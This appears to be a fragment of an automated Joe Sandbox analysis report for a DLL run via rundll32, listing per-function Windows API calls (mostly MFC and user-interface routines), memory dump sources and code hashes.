                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 356813703-0
                                                                                                                      • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                      • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Brush
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2798902688-0
                                                                                                                      • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                      • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                        • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                        • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                        • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 63617653-0
                                                                                                                      • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                      • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                      • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                      • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                        • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                      • _memset.LIBCMT ref: 1002D2F2
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4021759052-0
                                                                                                                      • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                      • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002D5FF
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                        • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString$H_prolog3_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842698744-0
                                                                                                                      • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                      • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                      • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                      • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                        • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                        • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                        • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                      • SendMessageA.USER32 ref: 10016A5B
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1877664794-0
                                                                                                                      • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                      • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                      • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                      • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 670545878-0
                                                                                                                      • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                      • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                      • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                      • GetWindowRect.USER32 ref: 1002059C
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                      • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1315500227-0
                                                                                                                      • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                      • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                      • API String ID: 2102423945-4122032997
                                                                                                                      • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                      • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 1529587224-3470857405
                                                                                                                      • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                      • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                      • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                      • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                      • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                      • API String ID: 2418878492-2500072749
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                      • _memset.LIBCMT ref: 1001579D
                                                                                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                      • LoadBitmapA.USER32 ref: 10015807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271682439-3916222277
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                      • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                      • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429671754-3916222277
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                      • String ID: B$DISPLAY
                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Edit
                                                                                                                      • API String ID: 0-554135844
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                      • SendMessageA.USER32 ref: 10023CD9
                                                                                                                      • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                      • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 187318432-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69039007-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
